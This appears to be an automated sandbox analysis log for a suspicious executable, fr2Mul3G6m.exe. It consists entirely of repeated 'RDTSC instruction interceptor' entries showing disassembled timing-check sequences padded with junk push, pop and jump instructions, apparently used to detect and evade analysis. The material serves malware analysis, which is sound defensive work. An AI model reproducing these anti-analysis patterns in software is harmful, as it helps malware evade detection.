                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4B7A31 second address: 4B7A3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4B7A3A second address: 4B7A40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4B7A40 second address: 4B7A44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4B7BB1 second address: 4B7BB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4B7D77 second address: 4B7D7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4B7EF8 second address: 4B7EFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4B7EFE second address: 4B7F02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4B8D83 second address: 4B8D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4B8D87 second address: 4B8D91 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBF093632E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4BD0F4 second address: 4BD0F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4BD0F8 second address: 4BD108 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBF093632E6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 40352E second address: 403532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 403532 second address: 403536 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4C3366 second address: 4C3383 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBF0920B206h 0x00000008 jl 00007FBF0920B206h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FBF0920B20Ah 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4C2F13 second address: 4C2F19 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4D069D second address: 4D06A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4D06A3 second address: 4D06CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FBF093632F7h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007FBF093632E6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4D2F2E second address: 4D2F42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FBF0920B206h 0x0000000a pop esi 0x0000000b pushad 0x0000000c jg 00007FBF0920B206h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4D2F42 second address: 4D2F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4D30D3 second address: 4D30D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4D30D7 second address: 4D30EB instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBF093632F6h 0x00000008 jmp 00007FBF093632EAh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4D30EB second address: 4D30F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4D5A84 second address: 4D5AD1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBF093632E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007FBF093632ECh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007FBF093632F6h 0x00000019 push edx 0x0000001a js 00007FBF093632E6h 0x00000020 jmp 00007FBF093632F6h 0x00000025 pop edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4D5AD1 second address: 4D5AD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4D5AD7 second address: 4D5AF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF093632F0h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 40A301 second address: 40A305 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 40A305 second address: 40A30B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4E5B02 second address: 4E5B08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4E5B08 second address: 4E5B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4E5B0C second address: 4E5B14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4E5B14 second address: 4E5B5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF093632F7h 0x00000007 js 00007FBF093632E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jbe 00007FBF093632FFh 0x00000015 jmp 00007FBF093632F7h 0x0000001a pushad 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push edi 0x0000001f push eax 0x00000020 push edx 0x00000021 jp 00007FBF093632E6h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4E5997 second address: 4E59A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF0920B20Ch 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4F0AD4 second address: 4F0B08 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBF093632E6h 0x00000008 jno 00007FBF093632E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 jmp 00007FBF093632F2h 0x00000016 pushad 0x00000017 popad 0x00000018 pop esi 0x00000019 push eax 0x0000001a push edx 0x0000001b jnc 00007FBF093632E6h 0x00000021 jp 00007FBF093632E6h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4EF882 second address: 4EF89A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jl 00007FBF0920B206h 0x0000000c jl 00007FBF0920B206h 0x00000012 popad 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4EF89A second address: 4EF8A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4EF8A0 second address: 4EF8A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4EF8A9 second address: 4EF8C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF093632F9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4EF8C6 second address: 4EF8F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF0920B216h 0x00000007 jmp 00007FBF0920B20Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007FBF0920B206h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4EF8F7 second address: 4EF934 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF093632F0h 0x00000007 jmp 00007FBF093632F7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBF093632F0h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4EF934 second address: 4EF94B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FBF0920B211h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4EF94B second address: 4EF958 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBF093632E8h 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4EFAA2 second address: 4EFABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FBF0920B210h 0x0000000c jl 00007FBF0920B206h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4EFABF second address: 4EFAEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF093632F3h 0x00000007 jmp 00007FBF093632F0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007FBF093632E6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4EFAEE second address: 4EFB02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF0920B20Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4EFB02 second address: 4EFB08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4EFB08 second address: 4EFB0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4EFB0C second address: 4EFB36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF093632ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBF093632F8h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4EFCA5 second address: 4EFCA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4EFCA9 second address: 4EFCAF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4EFCAF second address: 4EFCC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007FBF0920B206h 0x0000000d je 00007FBF0920B206h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4EFCC4 second address: 4EFCD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007FBF093632E6h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4EFCD5 second address: 4EFCD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4F4221 second address: 4F4242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF093632F9h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4F4242 second address: 4F425A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF0920B20Dh 0x00000009 jbe 00007FBF0920B206h 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 50166D second address: 501696 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007FBF093632E6h 0x00000011 jmp 00007FBF093632F8h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 501696 second address: 5016D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF0920B20Eh 0x00000007 jmp 00007FBF0920B212h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007FBF0920B218h 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 503C66 second address: 503C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF093632ECh 0x00000009 pop ecx 0x0000000a jng 00007FBF093632F2h 0x00000010 js 00007FBF093632E6h 0x00000016 jo 00007FBF093632E6h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 503C8D second address: 503C9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF0920B20Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 503C9F second address: 503CA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 503CA3 second address: 503CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF0920B215h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 503CC1 second address: 503CED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 je 00007FBF093632E6h 0x0000000f pop eax 0x00000010 ja 00007FBF093632FCh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 503AD3 second address: 503AFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF0920B210h 0x00000007 push esi 0x00000008 push eax 0x00000009 pop eax 0x0000000a jp 00007FBF0920B206h 0x00000010 pop esi 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 push esi 0x00000015 push edi 0x00000016 pop edi 0x00000017 pop esi 0x00000018 jo 00007FBF0920B20Ch 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 503AFE second address: 503B05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 510F72 second address: 510F76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 510F76 second address: 510F7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 510F7C second address: 510FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007FBF0920B206h 0x0000000d jmp 00007FBF0920B20Ah 0x00000012 popad 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 je 00007FBF0920B212h 0x0000001c jmp 00007FBF0920B20Ch 0x00000021 jmp 00007FBF0920B216h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 510FBF second address: 510FC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 510ABE second address: 510AC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FBF0920B206h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 510C40 second address: 510C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007FBF093632E6h 0x0000000c jmp 00007FBF093632F4h 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 510C61 second address: 510C7D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FBF0920B20Ch 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007FBF0920B208h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 510C7D second address: 510C8D instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBF093632EAh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 510C8D second address: 510C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 510C91 second address: 510C97 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 527EA5 second address: 527EAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 527EAD second address: 527EBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 je 00007FBF093632ECh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 527EBA second address: 527EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007FBF0920B208h 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 526CF3 second address: 526CF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 526CF7 second address: 526CFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 526CFB second address: 526D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 526D07 second address: 526D39 instructions: 0x00000000 rdtsc 0x00000002 je 00007FBF0920B206h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FBF0920B213h 0x00000014 pop esi 0x00000015 popad 0x00000016 pushad 0x00000017 push esi 0x00000018 jnp 00007FBF0920B206h 0x0000001e pop esi 0x0000001f pushad 0x00000020 push edx 0x00000021 pop edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 526E83 second address: 526EAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF093632F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FBF093632EFh 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 5271C7 second address: 5271CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 527A1A second address: 527A39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF093632F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jg 00007FBF093632EEh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 527A39 second address: 527A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007FBF0920B212h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 527A47 second address: 527A55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FBF093632E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 527A55 second address: 527A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 527A5B second address: 527A5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 52AB99 second address: 52ABC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF0920B20Ch 0x00000009 popad 0x0000000a pop edx 0x0000000b nop 0x0000000c mov edx, dword ptr [ebp+122D2C8Ah] 0x00000012 mov dl, FBh 0x00000014 push 00000004h 0x00000016 push ebx 0x00000017 mov edx, dword ptr [ebp+122D1E6Fh] 0x0000001d pop edx 0x0000001e push 02766B00h 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push edx 0x00000028 pop edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 52ABC9 second address: 52ABD3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBF093632E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
